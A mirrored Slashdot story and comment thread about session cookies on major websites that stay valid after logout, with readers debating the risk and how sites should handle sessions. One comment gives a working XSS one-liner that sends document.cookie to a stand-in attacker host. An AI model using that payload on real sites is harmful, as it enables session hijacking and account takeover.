Slashdot Mirror

← Back to Stories (view on slashdot.org)

Office 365, Amazon, Others Vulnerable To Exploit Microsoft Knew About In 2012

Posted by Soulskill on from the at-least-they're-consistent dept.

colinneagle writes "Ethical hacking professor Sam Bowne recently put a cookie re-use method to test on several major web services, finding that Office 365, Yahoo mail, Twitter, LinkedIn, Amazon, eBay, and WordPress all failed the security test. Both Amazon and eBay can be tied directly to your money via the method of payment you have on record. And, just for kicks, we tried it with Netflix. And it worked. Microsoft has apparently known that accounts can be hijacked since at least 2012 when The Hacker News reported the Hotmail and Outlook cookie-handling vulnerability, so Bowne was curious if Microsoft closed the hole or if stolen cookies could still be re-used. He claims he 'easily reproduced it using Chrome and the Edit This Cookie extension.'"

125 comments

  1. 2013 by Anonymous Coward · · Score: 1, Interesting

    The year we ban non open sourced softwares as a global threat to humanity.

    1. Re:2013 by hairyfeet · · Score: 2, Insightful

      Good lord are we REALLY gonna have to explain on every. damned. security. story. how having the source isn't magic? The "many eyes" myth is just that and just because a program or website is FOSS doesn't make it more secure? hell watch how easy it is to blow "many eyes" out of the water, ready?

      Now we ALL know that Slashdot is one of the most FOSS loving websites there is,right? That while the global numbers of Linux users are around 0.9% we could easily hit double digits here, right? this is like Geeker heaven, yes? Okay here goes...show of hands, how many of you have done an extensive code audit on Libre Office? Gimp? Firefox? Anyone? Bueller?

      NOW do you understand why simply having source means jack and squat? For many eyes to work IRL you'd have to have 1.- Enough guys with the requisite skills and experience to even SPOT the flaws, see the Obfuscated C contest as to why THAT is important, 2.- Those guys have nothing better to do than to scan and debug YOUR code all day, which considering how in demand highly skilled programmers are? Not very damned likely, and finally 3.- Have enough of them to keep up with the changes that when you are talking about FOSS is practically a torrent. hell I bet it would take a good year to do an extensive code audit of a large program like Libre office...how many releases did LO have last year? See the problem yet?

      Having the code fixes ONE problem and one problem alone, and that is old versions being abandoned. If you have the code AND you have the skills OR the money to hire your own dev team than and ONLY then will that code be a life saver, the rest of the time, and especially when we are talking about security, which involves not just the program itself but the underlying OS and subsystems? yeah...not so much. Frankly if even 3% of the code in your average distro gets seen by anybody but the guys running the projects I'd frankly be amazed but thanks to the "many eyes" myth people think because something CAN happen it HAS happened. Well by that logic because theoretically an immortal CAN be born then there are immortals running the earth, but i really don't think I have to worry about a 400 year old Scotsman with a sword coming at me in the parking lot, do you?

      --
      ACs don't waste your time replying, your posts are never seen by me.
    2. Re:2013 by amiga3D · · Score: 3, Insightful

      You ignore one obvious truth. With FOSS no matter how unlikely someone will look at the code it actually is a possibility that it will happen. With proprietary software there is no chance in hell. None. Nada. Zip! All kinds of nastiness hidden away and everyone knows their little nasty secrets are secure behind closed source. Proprietary software guarantees this kind of stuff will without any doubt happen. FOSS gives you a chance at least.

    3. Re:2013 by sjames · · Score: 1

      That is a key point. There are things some people will do if they are sure nobody will see but they will not do if there is even one chance in thousands that someone will see and have evidence to back it up. It changes the risk/reward decision drastically.

    4. Re:2013 by Anonymous Coward · · Score: 1

      Hairy, this is just the same old repeatedly debunked drivel you've been posting for most of the decade. If you're not prepared to learn from the very sensible replies that you're being given, you'll keep making the same mistakes forever.

      Please try to update your knowledge - you seem intelligent at times, but this refusal to learn from evidence that is repeatedly presented to you is beginning to look willful.

    5. Re:2013 by oreaq · · Score: 3, Interesting

      The other big advantage with FOSS is that the change and commit logs are publicly accessible. If you introduce a backdoor in a FOSS product you can't hide behind a corporation. Your own name is tied to that backdoor. This is a strong disincentive; decades of social, economic, and criminal studies prove that.

    6. Re:2013 by coofercat · · Score: 1

      I think also you forget that when a flaw is found in FOSS, it really does get many-eyes on it, and in fact, if it's a well-used application, it'll probably get multiple proposed patches too. Further, you could patch your own copy if you desire - thus, your copy at least is indeed more secure as a result.

      It's true, comparatively very few people really spend time reading code looking for flaws. However, a reasonably well run FOSS project should get fixes out the door far faster than most of the commonly used software vendors do.

    7. Re:2013 by hackwrench · · Score: 1

      First you start out stating that having the source code gives you nothing, then eventually vaguely admit that having the source code can get you part way to a solution. by then people begin to suffer from too long didn't read, but even if they do make itthat fast, as I said, it's vague. Clever.

  2. They know how cookies work right? by jmauro · · Score: 4, Insightful

    It looks like they're exporting, deleting and then reimporting cookies before the cookies are set to expire. They can then get back into the site they just had access to. I fail to see how this "exploit" isn't actually the expected behavior of a properly functioning login tracked with a cookie.

    1. Re:They know how cookies work right? by Antony+T+Curtis · · Score: 4, Informative

      It looks like they're exporting, deleting and then reimporting cookies before the cookies are set to expire. They can then get back into the site they just had access to. I fail to see how this "exploit" isn't actually the expected behavior of a properly functioning login tracked with a cookie.

      The complaint is that the expectation of "logging off" should invalidate existing cookies.

      --
      No sig. Move along - nothing to see here.
    2. Re:They know how cookies work right? by Anonymous Coward · · Score: 3, Interesting

      Yahoo mail auth cookies are stolen by ads on a regular basis and used to send spam as an authorized Yahoo user. It's been going on for a long time and still happens every day.

    3. Re:They know how cookies work right? by Anonymous Coward · · Score: 1

      To steal a cookie in this manner pretty much requires you gain control of the user's machine. You could easily install keyloggers/etc. and steal their password. I don't see how this is a vulnerability. It's like saying "Gmail contains a vulnerability where if I stand over someone's shoulder and watch them type their password, I can gain access to their gmail account". Maybe there's something I'm missing but, seems that way to me.

    4. Re:They know how cookies work right? by d00m.wizard · · Score: 4, Informative

      Again, the issue is that the cookies don't seem to be tied to a unique session, and thus can be used by non-authorized parties if they are able to grab an instance of your session.

      --
      * A world imprisoned screams with pain There are no leaders you can blame Your avarice destroyed your sphere And the
    5. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      Isn't that the websites problem? Is the browser supposed to scan for clicks that might indicate a log off action has occurred and delete cookies that it thinks might be related to login?

    6. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      Is this in the context of someone choosing "Remember my login"? Even if your session has expired, a new one is created for you. This is the reason you aren't supposed to use that option on a public computer or a computer you can't trust to be secure(free from malware that might steal cookies).

    7. Re:They know how cookies work right? by vux984 · · Score: 4, Informative

      Isn't that the websites problem?

      Yes it is, that's why they reported it as a problem with Office 365, Netflix, Amazon, etc you know... websites.

    8. Re:They know how cookies work right? by Cramer · · Score: 5, Informative

      Indeed. Except in this case the "logout" function simply instructs the browser to forget that cookie. Any machine that still has that cookie is still logged in. A logout should not only remove the cookie, but invalidate it's contents. Changing your password should invalidate every login immediately. Additionally, each "login" should create a different value.

      If (when) someone gets ahold of that cookie, they will have access to the account until the thing expires (if ever.) You have no way to get them out of your account; a logout won't do it, changing your password won't do it. (not that they knew your password in the first place)

    9. Re:They know how cookies work right? by Shados · · Score: 1

      Of course they're not tied to a unique session...they're "remember me" cookies. They're supposed to still work after you kill the session. And by definition they have very long expiration. Now, you can keep track on the server of which cookies you handed out, and if someone invalidates one (logs off), keep track of that and refuse the cookie if its provided again, but its a pretty rare implementation as its not really considered a big problem (as long as the cookies are only passed around via https...if they're not, its something else altogether).

      Its not a big exploit nobody knew about or anything, it works that way by design. You can argue against that design, but its no discovery or anything...

    10. Re:They know how cookies work right? by bdwebb · · Score: 3, Insightful

      It may be a website problem but it becomes a consumer problem, especially when the method of payment stored on an account can potentially be utilized by re-using cookies.

    11. Re:They know how cookies work right? by similar_name · · Score: 1

      Seemed a lot easier 14 years ago :)

    12. Re:They know how cookies work right? by similar_name · · Score: 1

      Missing link

    13. Re:They know how cookies work right? by Rockoon · · Score: 1

      Malware already has access to the users machine, and can install key loggers, etc..

      The fact that the post you replied to already mentioned this, but that you still think mentioning malware refutes something in the post that you replied to, tells us that you really have no clue what you are talking about with regards to computers, malware, security, and cookies.

      --
      "His name was James Damore."
    14. Re:They know how cookies work right? by Narcocide · · Score: 3, Interesting

      I don't know if this is true, but I get a LOT of spam from legit Yahoo servers, some of it occasionally from accounts of people I know who can't seem to keep their password secret, so that does lend a lot of credibility to this. I actually get quite a lot of spam (usually ~300 items per day to my main account alone) and with the exception of only Yahoo, HSBC and DNB, all of the rest has plainly come from spoofed/forged email servers.

    15. Re:They know how cookies work right? by rbayer · · Score: 2

      The complaint is that the expectation of "logging off" should invalidate existing cookies.

      Yes, but for what added benefit? If someone else has enough access privileges to get cookies from my browser session before I click logout, then they almost certainly have enough privileges to just install a key logger and steal my username/password directly. Same for if they're able to install a trojan browser that doesn't actually delete cookies when instructed to.

    16. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      if you are infested with malware your cookies are the least of your concerns and least likely target.

    17. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      Logging off should kill the session on the server side, making any past cookie no longer valid.

    18. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      XSS through ads or injected onto a wordpress page through updates would be more than sufficient.

    19. Re:They know how cookies work right? by LifesABeach · · Score: 1

      Given todays non community oriented businesses, could there be any other outcome then the one discovered so far?

      That would be insane, wouldn't it?

    20. Re:They know how cookies work right? by bdwebb · · Score: 1, Insightful

      WTF are you talking about? Your logic is that because of the functions of Malware is that many Malware programs install keystroke loggers, and because the AC post that I replied to mentioned keyloggers (even though he did not identify Malware), this somehow somehow refutes or invalidates my point??

      Since you obviously don't know how this works, Malware has access to the user's machine; however, in most cases the author or distributor of the Malware DOES NOT HAVE ACCESS TO THE MACHINE (in other words, the 'You' that the OP referenced). The OP, which is most likely you posting AC, identified that this is not a vulnerability because you can already access the machine and install a keylogger to steal the password. I did not say that this was not possible - to make sure you understand, I will explain slowly. My statement means that Malware designed specifically to obtain cookies that has been installed can forward that information to an unauthorized destination and therefore this cookie can be taken advantage of to gain access to sensitive information or to ordering interfaces with stored credit cards...which is definitely a vulnerability completely independent of the physical or remote access style vulnerability that the OP referenced.

      The vulnerability in question is the fact that a cookie can be copy-fucking-pasted and used as though the new location is the authorized, authenticated user with stored credit card information. I hope you are extremely high because your comment is probably one of the most idiotic that I've seen since I registered for Slashdot.

    21. Re:They know how cookies work right? by guruevi · · Score: 2

      Not necessarily. What if you simply get your media carrier stolen. You can't derive passwords from it, you can derive a history and cookies however which if you simply copy them to a similar system gives you straight back access to this.

      Also, if someone intercepts the cookies or does a HTTPS MITM redirect, the malicious site could simply ask for the cookies for said domain and then still forward you to the legitimate HTTPS domain.

      --
      Custom electronics and digital signage for your business: www.evcircuits.com
    22. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      Even easier: Open-Wifi...

    23. Re:They know how cookies work right? by shellster_dude · · Score: 1

      Providing they aren't setting the httponly attribute of the cookie (or the victim is using a really old browser, you only need one XSS vector:

      <script>document.write("<img src='http://attackerwebsite.com/?cookiesteal=" + document.cookie + "' />");</script>

    24. Re:They know how cookies work right? by Anonymous Coward · · Score: 0

      Stop digging that hole.

    25. Re:They know how cookies work right? by amiga3D · · Score: 1

      Nice. It seems the cloud is starting to rain.

    26. Re:They know how cookies work right? by Rockoon · · Score: 2

      The OP, which is most likely you posting AC

      Your keen insight into things continues to undermine you.

      --
      "His name was James Damore."
    27. Re:They know how cookies work right? by sjames · · Score: 1

      When you log out, the cookie should become useless. It's not even that hard. Cookies generally represent sessions and the session is a context held in a database. When you log out, the session is destroyed or marked invalid so that the cookie does nothing.

      Given that, one cannot help but wonder if the cookie actually carries sensitive information rather than just being an opaque pointer to it.

      One also wonders if the cookie will still get you access after it is supposed to expire if you send it anyway.

    28. Re:They know how cookies work right? by gl4ss · · Score: 1

      mitm? there's plenty of added benefit for providing a "invalidate all live tokens" logout button.

      --
      world was created 5 seconds before this post as it is.
    29. Re:They know how cookies work right? by Rich0 · · Score: 1

      I don't think I can buy that argument. Virtually every decent authentication technology that utilizes tokens/cookies of some kind invalidates them upon logout. The whole point of using such session tokens is so that master credentials like passwords don't get cached all over the place. In many systems the master credential isn't even able to be cached without greatly compromising its security (as with two-factor authentication).

      Master credentials should never be cached, and it only logically follows that session credentials which are cached shouldn't be treated like master credentials or they provide no additional security at all.

    30. Re:They know how cookies work right? by 0ld_d0g · · Score: 1

      I find that really hard to believe without actual evidence. More specifically, if someone did find a way to read domain cookies from a different domain that set them, it would be big enough news that every single session cookie would be vulnerable to that attack.

    31. Re:They know how cookies work right? by snadrus · · Score: 1

      With a 15-year-old yahoo mail account, I can say that my account has sent spam many times. I've changed my password frequently & it doesn't matter if I have a unique, 8 digit password new every few months. And this is with all log-ins on stock latest Ubuntu + latest Chrome behind NAT (fairly safe).

      --
      Science & open-source build trust from peer review. Learn systems you can trust.
  3. is this really an exploit? by Anonymous Coward · · Score: 1

    but you have to steal the cookies first?

    that's like saying, "hey, I can login using your account as long as I steal your password first."

    1. Re:is this really an exploit? by Mike+Buddha · · Score: 4, Funny

      that's like saying, "hey, I can login using your account as long as I steal your password first."

      That's a known exploit that Micro$oft has known about and REFUSED to fix for years!

      --
      by Mike Buddha -- Someday the mountain might get him, but the law never will.
    2. Re:is this really an exploit? by Anonymous Coward · · Score: 0

      yep, it is similar to the stupid vulnerabilities and exploits that require you to have admin or root access to run them. If they already have control of your system the game is long over.

  4. Let me get this straight by FalleStar · · Score: 2

    If a user has a website remember their login via a cookie, and I make a copy of that cookie and put it into my browser, I will be logged in as that user? I am shocked...

    It doesn't take much to be considered an "hacking professor" now days, does it?

    1. Re:Let me get this straight by d00m.wizard · · Score: 2

      The issue here, is people are expecting their sessions to be tied to a unique cookie for authentication, and this isn't the case.

      --
      * A world imprisoned screams with pain There are no leaders you can blame Your avarice destroyed your sphere And the
    2. Re:Let me get this straight by uglyduckling · · Score: 2

      Not if the "remember me" option has been clicked, that's the point.

    3. Re:Let me get this straight by ackthpt · · Score: 1

      If a user has a website remember their login via a cookie, and I make a copy of that cookie and put it into my browser, I will be logged in as that user? I am shocked...

      It doesn't take much to be considered an "hacking professor" now days, does it?

      Someone alert the Girl Scouts, this is an easier way to make money on Cookies.

      --

      A feeling of having made the same mistake before: Deja Foobar
    4. Re:Let me get this straight by Anonymous Coward · · Score: 2, Interesting

      You can have multiple sessions per cookie. This is how you are able to go back to a site when you've asked it to Remember your login and be logged in automatically. No one in their right mind is going to have a server keep a session open occupying resources for days at a time. Sessions are pretty temporary, whereas cookies for automatic login usually don't expire for a couple of weeks.

      The more likely issue is that the ID of the cookie should be tracked in a database, and logoff should invalidate it so that it will not be accepted in the future.

    5. Re:Let me get this straight by Anonymous Coward · · Score: 0

      The issue here is their is no issue. If people are in a position to steal your session and your cookies from your browser you already have far far worse issues. It is the equivalent of complaining that someone inside your bank vault can pickup the money when they are told they are not allowed too. They should not be in your vault to start with.

    6. Re:Let me get this straight by Anonymous Coward · · Score: 0

      at most this is a very minor issue and should be on their fixit list as a low priority if devs have the time. this is hardly the evil exploit the article makes it out to be.

    7. Re:Let me get this straight by aztracker1 · · Score: 1

      I would say the logoff should invalidate the session cookie for that machine, and that it should also delete the remember-me cookie... beyond that, if the remember-me cookie/token is the same on different machines, it shouldn't be... I tend to login to google on 4 different computers, and 3 different mobile devices regularly... it's hard enough not having to re-login to one of them a day (with remember me), it's just me using these things... I'd hate to have one expire take them all out.

      --
      Michael J. Ryan - tracker1.info
    8. Re:Let me get this straight by chipschap · · Score: 1

      I am no Microsoft fan but I have to ask why this is being flagged as a problem that Microsoft didn't fix?

    9. Re: Let me get this straight by chill · · Score: 3, Insightful

      No, it isn't. If you explicitly click "log out" it is supposed to log you out and you have to explicitly log back in.

      "Remember me" is only supposed to keep you signed in if you don't explicitly log out, such as by just leaving the page or closing the browser.

      Otherwise, how do you actually log out of a session?

      --
      Learning HOW to think is more important than learning WHAT to think.
    10. Re:Let me get this straight by Yaur · · Score: 2

      "Keeping a session open" consumes in the neighborhood of 20-40 bytes in a database... not significant by any stretch of the imagination. The way we do it is that the cookie maps to a session Id and "logout" removes the cookie and closes the session in the database.

    11. Re:Let me get this straight by EkriirkE · · Score: 1

      I used to demo this all the time with open wifi traffic. Tis trivial. Cookies should use session IDs that expire, and tie to a browser's useragent (though this is easily spoofed, its just another layer). I used to also reference the IP somehow but this causes issues with mobile and DSL.

      --
      from 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
      to 45 2F 6E 40 3C DF 10 71 4E 41 DF AA 25 7D 31 3F
    12. Re:Let me get this straight by Anonymous Coward · · Score: 0

      Because Slashdot.

    13. Re:Let me get this straight by Anonymous Coward · · Score: 0

      Checking if the session is valid in the database for each page-view puts so much load on that database that it's not feasible for any large-scale web site.
      You would need a whole infrastructure on in-memory DB servers, just to keep up.

    14. Re:Let me get this straight by bad-badtz-maru · · Score: 1

      What are you serving, static content? Don't you have to go to the database for other page content, or to grab something like the user's name?

  5. https or http? by Anonymous Coward · · Score: 1

    That's a big deal only if the sites are using plain unencrypted html. In that case your cookies are visible to anyone on the same network (i.e. same coffee shop) so anyone can impersonate you.

  6. What? by OverlordQ · · Score: 1

    And the person with the cookie can still use your account after you log off.

    So the "Log off" feature is the opposite of security--blocking the authorized user but not blocking the attacker.

    So if I login to GMail with my phone and my desktop, if I log off on my desktop it should kill my phone too? How the hell is that better?

    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:What? by amorsen · · Score: 3, Interesting

      So if I login to GMail with my phone and my desktop, if I log off on my desktop it should kill my phone too? How the hell is that better?

      If you log in to GMail twice, you get two different cookies. In a sane world, when you hit "logout", the specific cookie gets invalidated and you have to log in again on that device if you want back in. Hotmail (seemingly unlike GMail) does not exist in a sane world.

      --
      Finally! A year of moderation! Ready for 2019?
    2. Re:What? by uglyduckling · · Score: 4, Insightful

      No. When you login, your session cookie should have an ID unique to that browser session. When you logout, it should cancel that ID at the server side, so even if the cookie persists it would be invalid. It seems like many websites are implementing this functionality by just deleting the session cookie when you logout. That's a problem.

    3. Re:What? by gooman · · Score: 4, Funny

      And the person with the cookie can still use your account after you log off.

      So the "Log off" feature is the opposite of security--blocking the authorized user but not blocking the attacker.

      So if I login to GMail with my phone and my desktop, if I log off on my desktop it should kill my phone too? How the hell is that better?

      Please DO NOT log out of your Gmail account.

      It makes you more difficult to track.

      Sincerely,

      Your Government

      --
      "Kittens give Morbo gas!"
    4. Re:What? by aztracker1 · · Score: 1

      I'd actually take it a small step farther and tie the cookie id on the server to the browser's useragent string... string changes (unlikely in an active session)... session/autologin are nuked as well... though not 100% fullproof, would prevent at least some casual stealing of cookies.

      --
      Michael J. Ryan - tracker1.info
    5. Re:What? by Anonymous Coward · · Score: 0

      that would be the point that everyone else here is missing. sure it is harder to implement, but you'd expect the best security from the biggest companies.

    6. Re:What? by eWarz · · Score: 1

      Considering that I am the king of my country...I don't think i'm spying on myself? :) Could be wrong though....

    7. Re:What? by amiga3D · · Score: 1

      I wouldn't. The biggest companies are so big they can do what they want with impunity. Small companies mostly seem to actually give a shit about their customer's opinions whereas the big ones generally seem to say "take it or leave it." If the small companies start to take market share the big companies either drive them out of business or buy them out depending on which is easier at the time.

    8. Re:What? by gl4ss · · Score: 1

      in a sane world you get option to do whichever logout you want.

      facebook offers "log out all devices" which invalidates all tokens.

      --
      world was created 5 seconds before this post as it is.
    9. Re:What? by 3247 · · Score: 1

      That does not help if you don't log out. In this case, the stolen cookie remains valid until the thief lets it expire by no longer using it.

      The only way to make this attack impossible is to provide the user with an overview of all valid cookies and an option to log out some or all of them. As an alternative (or better: in addition), all remembered logins should expire after a reasonable time (e.g. a month) on the server side and without an option to renew them without entering the password.

      --
      Claus
    10. Re:What? by 0ld_d0g · · Score: 1

      Small companies mostly seem to actually give a shit about their customer's opinions

      No average website user even knows about this, much less have an opinion on it !! Which customer is going to explain their preferred session cookie design to a company? And even if they did why would a company task resources (costing thousands of dollars/week ) to improve their codebase just to keep one/two customers? It doesn't make any business sense (either for a small or a big company). "Doing the right thing" - very rarely and in most cases only accidentally has lead to more business.

    11. Re:What? by Anonymous Coward · · Score: 0

      Deviantart does that, IIRC.

  7. OWASP Save Us! by Qzukk · · Score: 2

    Can someone please come up with a "best practices" for this? Say "This is how you log a browser user in, this is how to check if a given browser is a logged in user, this is how to log out a user?" (That last one is important, no browser provides a logout button for Basic Authentication) Is storing everything server side in a session (referenced by a session cookie) the best way to do this? What about mobile users, is their IP static throughout a session or does their IP change if they change cells?

    The Authentication Cheat Sheet is a good start, but basically cuts off at "use SSL, require long passwords, and make authentication someone else's problem with single-sign-on." Does anyone really know or have they merely amassed years of experience doing what they think is right?

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
    1. Re:OWASP Save Us! by Anonymous Coward · · Score: 1

      there simply is no single best answer. security in the user realm is a tradeoff between usability and safety. The most secure systems won't get used as they put to heavy a requirement on the user and vice versa. You basically when creating a system need to get a balance between good security and something users will actually use. Sometimes excessive security makes security even weaker rather than stronger, for example if you force users to change passwords too often or make them be too long they reuse passwords with numbers or dates/names or write them down or even store them in a cleartext file in the computer itself.

    2. Re:OWASP Save Us! by aztracker1 · · Score: 2

      Three potential cookies...

      Automatic Login / Remember Me: Ideally only a token/key to a server-side record. Said record should probably also have your useragent string (for spoofing detection. This is used on the login screen to auto-log you in, if not already logged in, and create a new authenticated session value. If you explicitely logout, this should be deleted on the client and the server.

      Session Token/Cookie: A token used for a single session, you may want to also correlate this with the user's agent, as well as their IP address, depending on your needs. If you logout, this should be deleted and the server-side record expunged. This should be associated with server-side records and temporary information necessary.

      Authentication Cookie: A server-side encrypted cookie that is used to store your username and roles, it should also contain your current session token. This is to reduce the need for potentially expensive rules lookups and to validate access early on. You should also check against the current session... a non-match should invalidate said cookie. Any kind of logout should delete this cookie.

      By using this combination of cookies you can have additional validation constraints in place. The remember-me is only really used from the login screen as an auto-login and redirect flag. This should be checked against a database. The session cookie is again only a lookup id, so that you can access/check other information... A separate Authentication Cookie allows you to keep some information in the cookie, and it should be checked and validated against the active session id, which has its' own checks.

      A logout should remove all three cookies. The cookies should be unique per system... a 1 - many relationship of users to autologin / session cookies in the database. You also may want to limit 5 sessions/autologin to a user, deactivating any but the 5 most recent on use. You may also want to check last use of autologin... if a cookie hasn't been used in over a week, then it's invalid... if its more than say 3-4 weeks old, it's in valid. ... for session cookies, that timing should be less, depending on your needs.

      --
      Michael J. Ryan - tracker1.info
    3. Re:OWASP Save Us! by Anonymous Coward · · Score: 0

      Create matching session ids on server and cookie, add lengthy CSRF hash. Do not store usernames and passwords in cookies. Use HTTPS before the user logs in and authenticates. Eliminate cookies before any regular HTTP session can restart. Match all requests against session ids and CSRF hashes. When they log out close the server side session and delete cookies. If they use "keep me logged in" create a temporary session, but nothing that can't be used to actually access the site without verification such as user agent and/or IP (unless mobile).

  8. The bigger problem by gmuslera · · Score: 0

    Is not that Windows have a vulnerability, from time to time a vulnerability is found in a lot of systems. The problem is that they didn't fixed, on pourpose, so you can get hacked. That they held that bug since a year ago gives a hint on how safe you should feel with it.

  9. What has this got to do with Microsoft? by black3d · · Score: 2, Interesting

    Is this entire article some kind of joke? If you have physical access to a machine and are able to "steal" the cookies from their logged in browser session, then on another machine replicate that browser session and utilize that same logged in cookie so that the site can't tell the difference between the machine you HAVE PHYSICAL LOGGED-IN ACCESS TO and the replicated session, so you're able to continue using the site? Isn't this behaviour "as intended"?
     
    This would only be a "flaw" if another site could remotely copy my cookies and continue my session 'as me'. (Well, actually, I have Java installed, so they probably can *cough*). Otherwise, it's exactly how a logged in cookie is meant to work. The only tacit connection to "Microsoft" seems to be that "Microsoft, like some other companies.. have websites on the internet."
     
    Actually, the fact that Microsoft requires re-authentication to make any account changes is actually a good thing. The article makes some excuse about "what's the use of that if they're already able to read the emails with the logged in cookie", to which I counter - YES, OR.. YOU KNOW.. READING THE EMAILS ON THE LOGGED IN SESSION YOU ALREADY HAVE ON THE ORIGINAL MACHINE IN FRONT OF YOU.

    --
    "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    1. Re:What has this got to do with Microsoft? by gbkersey · · Score: 1

      Not really a joke. One could use a Trojan to steal cookies... So you don't need physical access.

    2. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      PS. I do understand that the original issue is that the cookie isn't expiring server-side "as fast as they would like", but it will do. The complaint isn't that someone can come along and pick up a logged out browser session and use old cookies to "log in". No - the cookie has to be copied from the logged in session - in other words, already have access to the machine in a logged in state. If malware has already rooted your machine to this point, then trust me.. they've just keylogged your login, and don't care about your cookies.
       
      It's clear "logging out" for a vast majority of sites expires the client-side cookie immediately. The server-side cookie will time out on its own. If there are sites where these persist "forever", that's a hugely different issue to "it didn't expire on their side as soon as I told it to, so I can still access it with the cookie I copied while I was still logged in to the session".. And again, has as much to do with Microsoft as it does with.. say.. Hasbro, considering the same behaviour doubtless occurs on their site. BARBIE WANTS TO STEAL YOUR COOKIES!

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    3. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      Not really a joke. One could use a Trojan to steal cookies... So you don't need physical access.

      Those Trojans love cookies.

    4. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 1

      Not really a joke. One could use a Trojan to steal cookies... So you don't need physical access.

      Is your post a joke? if they have Trojan's installed on your machine why would they bother just stealing your cookie when they could instead take your password and everything else.

    5. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      If you have a Trojan on the user's machine, you're already on the other side of the security boundary. Why are you stealing their cookies when you have full access to the machine?

    6. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      The issue is that "logging out" does not expire the session associated with the cookie on the server - and that is a bad practice. Is it the end of the world? No, unless the site has some terrible flaw in session ID generation.

    7. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      Right, but a trojan could just keylog me as well. Or read the passwords stored by my browser.
       
      Look, I do understand the issue, I just don't see it as an issue. This has pretty much been the "expected" and likely intended behavior server-side for years. As another example, take almost any commercial forum software. Login in and open up two threads in two tabs. Log out in one of the tabs - the other is still logged in, using the same cookie, and can keep browsing and posting on your logged in account. Even though you've explicitely clicked "log out" in one tab, the server doesn't immediately throw away the cookie. It doesn't *know* you have another tab open, but doesn't presume you don't and kill everything.
       
      Maybe it should - but this is not normal behavior. The server-side cookies will expire on their own, and it seems kinda paranoid to attack Microsoft for an "issue" (I invert the comments as I believe it's intended behavior) which is web-wide, and can only generally be exploited by either someone who already has access to the account, or an already compromised machine.

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    8. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      Yeah, I understand that issue - I was probably a little over the top in my first post. I followed up in a couple of other replies (eg, http://slashdot.org/comments.pl?sid=3981407&cid=44303997) that I get what they're saying the issue is, but that this is fairly standard "intended" behavior. Hence why it occurs on most major sites - servers decide when to expire their logins, rather than clients. I just thought it was odd that the author jumped all over it being a "Microsoft" issue, when it's just as much a "Google" or "Sourceforge" issue, etc.

      Actually, the whole "Microsoft knew about it in 2012!" thing is kinda amusing, since it's actually more like "most of us knew about it in 2003.."

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    9. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      I think the worry is that with XSS techniques, browser exploits, or with DNS based (man in the middle, cache poisoning) attacks you can steal cookies intended for other sites. The cookies aren't stored or accessed in a cryptographically secure manner. You just have to convince a browser that you have access to a particular cookie.

      Making sure the cookies are invalidated quickly limits the risk.

      Are there any cryptographic cookie mechenisims? Would be useful if a site could only grab a cookie if it held the right key for a challenge/authentication. (Browser says. Ok! Now prove who you are with your certificate before you can have this cookie)

    10. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      Not really a joke. One could use a Trojan to steal cookies... So you don't need physical access.

      Those Trojans love cookies.

      I heard "Trojan Man" loves cookies with his condoms... especially the dark and chunky kind!

    11. Re:What has this got to do with Microsoft? by black3d · · Score: 1

      While sites do use encryption mechanisms in their cookies sometimes, that doesn't prevent MITM attacks (or of course, a compromised machine) from continuing the access anyhow. In fact, of all the attack vectors, XSS is the only one which could be prevented by the cookies timing out server-side instantly.
       
      What I mean by that is, the other attack vectors all provide alternate methods of intrusion other than stealing a cookie from your PC.. malware can just keylog, DNS poisoning can present you with an entirely fake site to capture your login details, and, for example, in an MITM attack you're never actually getting the correct cookie - the MITM has it, and subsequently your log-out request doesn't have to be passed on by the attacker and generally wouldn't be.
       
      My point is, this particular flaw in cookies isn't specifically a Microsoft issue. Microsoft, like most other sites out there (say, Amazon, Ebay, etc :)) choose when to time out their cookies rather than allowing the client to specifically insist on it happening.
       
      While it can be done (Slashdot does, for example, kill your cookie server-side whenever you choose to log out - not when you close the browser though, as it doesn't know and just relies on a regular time-out) it's generally not a security issue unless there's already another underlying security issue in order to exploit it.

      --
      "The true measure of a person is how they act when they know they won't get caught." - DSRilk
    12. Re:What has this got to do with Microsoft? by khchung · · Score: 1

      Is this entire article some kind of joke? If you have physical access to a machine and are able to "steal" the cookies from their logged in browser session, then on another machine replicate that browser session and utilize that same logged in cookie so that the site can't tell the difference between the machine you HAVE PHYSICAL LOGGED-IN ACCESS TO and the replicated session, so you're able to continue using the site? Isn't this behaviour "as intended"?

      Ever heard of Internet Cafe? Even seen public PC open for everybody to use in airports or other places?

      This vulnerability means, if you EVER logged in to these sites once in public PCs, and if that PC has been compromised, then the cookies that have been used in that PC could have been copied to somewhere else and use to access those sites as you. And you have no way to invalidate those cookies even if you have logged out from that site, EVEN IF YOU CHANGE YOUR PASSWORD immediately afterwards.

      The correct way to use cookies is for it act as a key, and only a key, to some storage on the server side, i.e. the site itself. And once the user clicked "log out", that storage should be cleared and the cookie expired, so the key became invalid even if someone saved it and tried to reuse it later. Changing password should invalid all these session storage for that account.

      --
      Oliver.
    13. Re:What has this got to do with Microsoft? by Anonymous Coward · · Score: 0

      Thank you, I feel entirely at ease now. Since no browser has ever been fooled by one site into giving up cookie data meant for another site unless the machine has already been hopelessly compromised, I am completely safe.

    14. Re:What has this got to do with Microsoft? by black3d · · Score: 1

